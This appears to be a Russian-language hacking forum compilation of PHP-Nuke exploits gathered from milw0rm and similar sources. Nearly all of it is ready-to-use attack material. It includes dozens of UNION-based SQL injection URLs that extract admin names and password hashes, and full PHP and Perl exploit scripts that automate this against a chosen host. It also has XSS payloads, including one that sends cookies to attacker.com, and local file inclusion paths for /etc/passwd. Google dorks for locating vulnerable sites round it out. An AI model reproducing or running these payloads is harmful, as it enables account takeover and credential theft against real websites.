Обзор уязвимостей PHP-Nuke. [SQL-Injection] PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql) PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit [Remote File Inclusion] PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions [XSS] PHP-Nuke versions: 8.0 (by ettee) Example: Code: [target]/modules.php?name=Search&query=<script+src=http://someshit.net/xss.jpg+ xss.jpg: alert (document.cookie); PHP-Nuke versions: 7.8 Example: Code: http://site.com/?pagetitle=title [Modules Vulns] PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln PHP-Nuke addon Nuke Mobile Entartainment LFI Vulnerability PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit [DB Structure] (cms) Code: [B][nuke_authors][/B] name email pwd radminsuper Hash = md5(pwd) (forum) Code: [B][nuke_users][/B] username user_email user_icq user_password user_newpasswd Hash = md5(user_password) [Default Paths] Admin: Code: [target]/admin.php Config: Code: [target]/config.php
PHP-NUKE NukeSentinel Module Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename. [Local File Inclusion] PHP: http://site/autohtml.php?filename=../file.php http://site/autohtml0.php?filename=../file.php [Information Leakage] PHP: http://site/autohtml.php?filename=../.htaccess http://site/autohtml0.php?filename=../.htaccess С помощью локального инклюда можно обнаружить важную информацию на сервере. В частности в .htaccess можно узнать настройки сайта, в том числе полный путь (что будет full path disclosure), при использовании NukeSentinel на сайте. А также можно обнаружить путь к его конфигурации и получить логины и хэши админов. [Full path disclosure] PHP: http://site/autohtml.php?filename=12345 На некоторых сайтах с данным скриптом, где не отключено выведение ошибок, при указании несуществующего файла выводится сообщение об ошибке с полным путём к скрипту. (c) MustLive <mustlive_(at)_websecurity.com.ua>
XSS Code: modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script> modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script> modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337> modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script>< modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays= modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);> modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays= modules.php?name=Journal&file=friend&jid=2&yun= modules.php?name=Journal&file=friend&jid=2&ye= modules.php?name=Journal&file=add&filelist[]= modules.php?name=Journal&file=modify&filelist[]= modules.php?name=Journal&file=delete&jid=&forwhat=waraxe modules.php?name=Journal&file=comment&onwhat= modules.php?name=FAQ&myfaq=yes&id_cat=1&categories= modules.php?name=Encyclopedia&op=terms&eid=1<r= modules.php?name=Encyclopedia&op=content&tid=774&page=2&query= modules.php?name=Encyclopedia&file=search&eid= modules.php?name=Encyclopedia&file=search&query=f00bar&eid= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage= modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits= modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer= modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9 modules.php?name=News&file=article&sid=1&optionbox= modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date= modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l= modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0 modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0 modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold= modules.php?name=NukeJokes&func=CatView&cat= modules.php?name=NukeJokes&func=JokeView&jokeid= modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle= modules.php?name=Downloads&d_op=viewsdownload&sid= modules.php?name=Search&sid= modules.php?name=Search&query=*&max= modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments modules.php?name=Search&a=6&query=*&match= modules.php?name=Search&query=*&mod3= modules.php?name=Calendar&file=submit&type= modules.php?name=Calendar&file=submit&op2=Preview&day= modules.php?name=Calendar&file=submit&op2=Preview&month= modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query] modules.php?name=NukeJokes&func=CatView&cat=[xss code here] modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here] modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2 modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2 modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2 modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2 modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS] banners.php?op=EmailStats&login=[our_login]&cid=1&bid= modules.php?name=Encyclopedia&file=index&op=terms&eid=1<r= PHP: <html> <form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index> <input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> <input type=submit name=sub> <script>document.searchform.sub.click()</script> </html> Search Module(all versions) <img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) < <iframe src=http://www.google.com style=display:none onload=alert(document.cookie) < Pool and News Module PHP: <img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);" SQL injection: Code: modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/* modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/* modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20FROM%20nuke_users/* modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/* modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/* modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2 modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/* modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1 modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1 modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1 Full Path Disclosure modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=oob&date=00b /modules/Web_Links/voteinclude.php /modules.php?name=Statistics&op=convert_month /modules.php?name=Journal&file=add&filelist=oob /modules.php?name=Journal&file=modify&filelist=oob /db/db.php index.php?inside_mod=1 /modules.php?name=Downloads&d_op=menu /modules.php?name=Web_Links&l_op=menu modules.php?name=Web_Links&l_op=viewlink&cid=1&show=oob modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=oob modules.php?name=NukeJokes&func=CatView&cat=oob modules.php?name=Downloads&d_op=viewdownload&cid=2&show=oob modules/Calendar/config.php modules/Calendar/index.php /modules/Calendar/submit.php error.php?newlang=foobar modules/coppermine/include/crop.inc.php modules/coppermine/ecard.php modules/coppermine/displayecard.php modules/coppermine/db_input.php modules/coppermine/config.php modules/coppermine/addpic.php modules/coppermine/phpinfo.php modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=foobar modules.php?name=NukeJokes&func=CatView&cat=foobar modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1 dork: "create the Super User" "now by clicking here" inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation" "Warning: setlocale()" intitleHP-nuke.powered.site "create * Super User" "now * clicking here" "Powered by PHP-Nuke" Copyright © 2003 by PHP-Nuke "allinurl:modules.php sgallery" "powered by phphnuke 6.0" intitle:"PHP-Nuke Powered Site"
PHP-Nuke <= 8.0 (sid) Remote SQL Injection Remote SQL Injection Vulnerable: PHP-Nuke <= 8.0 Exploit: Code: <?php ########################################################## # UNPUBLISHED RST/GHC EXPLOIT # PHP Nuke `sid` sql injection exploit for Search module # POST method - # the best for version 8.0 FINAL # (c)oded by Foster & 1dt.w0lf ########################################################## # tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions ########################################################## if (isset($_POST['Submit'])){ $result=sendit('CONCAT("::",aid,"::",pwd,"::")'); if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches)) {$ahash = $matches[2]; $aname = $matches[1];} } function sendit($param){ $prefix = $_POST['prefix']; $data = $_POST['sql_text']; $host = $_POST['hostname']; $page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : ''; $page .= '/modules.php?name=Search'; $method = $_POST['method']; $ref_text = $_POST['ref_text']; $user_agent = $_POST['user_agent']; $result = ''; $sock = fsockopen($host, 80, $errno, $errstr, 50); if (!$sock) die("$errstr ($errno)\n"); fputs($sock, "$method /$page HTTP/1.0\r\n"); fputs($sock, "Host: $host" . "\r\n"); fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($sock, "Content-length: " . strlen($data) . "\r\n"); fputs($sock, "Referer: $ref_text". "\r\n"); fputs($sock, "User-Agent: $user_agent" . "\r\n"); fputs($sock, "Accept: */*\r\n"); fputs($sock, "\r\n"); fputs($sock, "$data\r\n"); fputs($sock, "\r\n"); while (!feof($sock)) { $result .= fgets ($sock,8192); } fclose($sock); return $result; } ?> <head> <meta http-equiv=Content-Type content="text/html; charset=windows-1251"> <TITLE>RST/GHC PHP Nuk'em exploit</TITLE> <style> a:link{color: #000000; text-decoration: none;} a:visited{color: #000000; text-decoration: none;} a:hover,a:active{color:#e49a34; text-decoration:underline;} table{color:#000000;font-family:verdana;font-size:8pt;} .style2 { color: #FFFFFF; font-weight: bold; } .style3 {color: #E39930} .style5 {color: #000000; font-weight: bold; } </style> <body bgcolor="#525254"> <form method=post> <p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p> <table width="900" border="0"> <tr bgcolor="#FFFFFF"> <td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td> <td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url </font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font> </strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60"> </font></td> </tr> <tr> <td bgcolor="E39930">SQL query</td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?>" size="80"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user agent</font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td> <td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif"> <input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>"> </font></td> </tr> <tr> <td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td> <td bgcolor="#999999"><select name="method" size="1" id="method"> <option value="POST">POST</option> <option value="GET">GET</option> </select></td> </tr> <tr> <td bgcolor="E39930"> </td> <td bgcolor="#999999"> </td> </tr> </table> <p> <input type="submit" name="Submit" value="rock-n-roll"> </p> </form> <font size="2">(c) RST/GHC</font> <hr size="3"> <? # DEBUG print $result; ?> # milw0rm.com [2008-01-22]
Remote SQL Injection PHP-Nuke < 8.0 Exploit Code: <?php error_reporting (E_ERROR); ini_set("max_execution_time",0); echo ' +=========================================+ | RST/GHC unpublished PHP Nuke exploit <8 | +=========================================+ <+> version <8.0 <+> Tested on 7.9 & 6.0 '; if ($argc < 2){ print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n"; print "ex.: " . $argv[0] . " phpnuke.org 7\n"; credits(); exit; } /* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'"; $version = 6; break; default: $query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1"; $version = 7; break; } $host = 'http://' . $argv[1] . '/'; # argv[1] - host $http = $host . $query; echo '[+] host: '.$host . ' [+] nuke version: '.$version.' '; #DEBUG //print $http . "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];} else {echo "Exploit failed...";} credits(); function credits(){ print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC"; print "\n\r+========================================+\n"; exit; } ?> # milw0rm.com [2008-01-22]
PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability example Code: http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit} EXPLOIT 1 : Code: -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201 EXPLOİT 2 : Code: -90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201 (c)milw0rm.com
PHP-Nuke Module Sections (artid) Remote SQL Injection SQL Injection Code: Пример: www.xxX/xxxxSections&op=viewarticle&artid=(exploit) Код: 9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2 Для поиска сайтов с этим модулем: Code: allinurl: "имя секции" (c)
PHP-NUKE Modules Okul v1.0 Remote SQL Injection SQL Injection Code: modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/* PHP-Nuke Module Inhalt (cid) SQL Injection SQL Injection Code: modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2 modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2 (c) biyofrm.com
PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection SQL Injection Code: modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/* PHP-Nuke Module Siir (id) Remote SQL Injection SQL Injection Code: modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 Для поиска Code: allinurl: modules-php-name-Siir (c) s@bun
PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection PoC: Code: /modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability Exploit_: Code: modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors Exploit_2: Code: modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors (c) milw0rm.com
Php Nuke "Sell" module SQL Injection ("cid") SQL Injection Exploit: Code: modules.php?name=Sell&d_op=viewsell&cid=- 9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0, aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability SQL Injection Exploit: Code: modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
Passive XSS XSS Заходим на http://rus-phpnuke.com/ в поле поиска вбиваем "><iframe src="javascript:alert(document.cookie);" < и видим куки. Ксс в первом посте найденая ettee не пройдет, т.к. там стоит жесткая фильтрация гета, или только кодированием. Sql inj modules 4nAlbum File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198 example: http://site.name/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=[exploit] Injection: -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/* зы сплойты пойдут лесом если их правильно не закодировать. ^__^ {c}gibson
PHP-Nuke Copyright 2005 SQL Exploit: Code: -1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1, aid,pwd+from+nuke_authors+where+radminsuper=1 Google dork: Code: allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi" allinurl:"gaestebuch_v22&func"
PHP-Nuke Module eGallery "pid" Remote SQL Injection PoC: Code: modules.php?name=eGallery&file=index&op=showpic&pi d=- 9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0, aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 PHP-Nuke Module "seminar" Local FIle Inclusion PoC: Code: modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../.. /etc/passwd Google dork: Code: inurl:"modules.php?name=seminar" Regards, The-0utl4w
PHP-Nuke KutubiSitte "kid" SQL Injection PHP-Nuke KutubiSitte "kid" SQL Injection Exploit: Code: #!/usr/bin/perl use Getopt::Std; use LWP::UserAgent; sub usg{ printf(" -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- | PHP-NUKE KutubiSitte [kid] => SQL Injection | -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- ####################################################### # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 # ####################################################### <-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-> #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:# #:-------------------------------------------------------:# :#| USAGE: |#: :#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#: #:-------------------------------------------------------:# #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:# #:-------------------------------------------------------:# :#| EXAMPLE: |#: :#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#: #:-------------------------------------------------------:# #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:# "); } sub problem{ print "\n\n[~] SITO NON VULNERABILE [~]\n\n"; exit(); } sub exploitation{ $conn = LWP::UserAgent -> new; $conn->agent('Checkbot/0.4 '); $query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A"; $return_pwd = $conn->get($query_pwd) || problem(); $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem(); print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n "; } getopts(":h:p:U:",\%args); $host = $args{h} if (defined $args{h}); $path = $args{p} if (defined $args{p}); $user_id= $args{U}if (defined $args{U}); if (!defined $args{h} || !defined $args{p} || !defined $args{U}){ usg(); } else{ exploitation(); } Bug found by Lovebug Exploit coded by r080cy90r from RBT-4
PHP-Nuke SQL injection Module "Hadith" [cat] SQL Injection Exploit: Code: modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A Found by Lovebug [rbt-4]
PHP-Nuke Module NukeC30 sql injection SQL Injection Vulnerable: Version 3.0 Exploit: Code: http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd), 2/**/from/**/nuke_authors/*where%20admin%20-2 Found by HouSSaMix from H-T Team
PHP-Nuke Module ZClassifieds [cat] SQL Injection SQL Injection Vulnerable: Module ZClassifieds Exploit: Code: modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd, aid/**/from/**/nuke_authors/*where%20admin1/** ...thx Lovebug...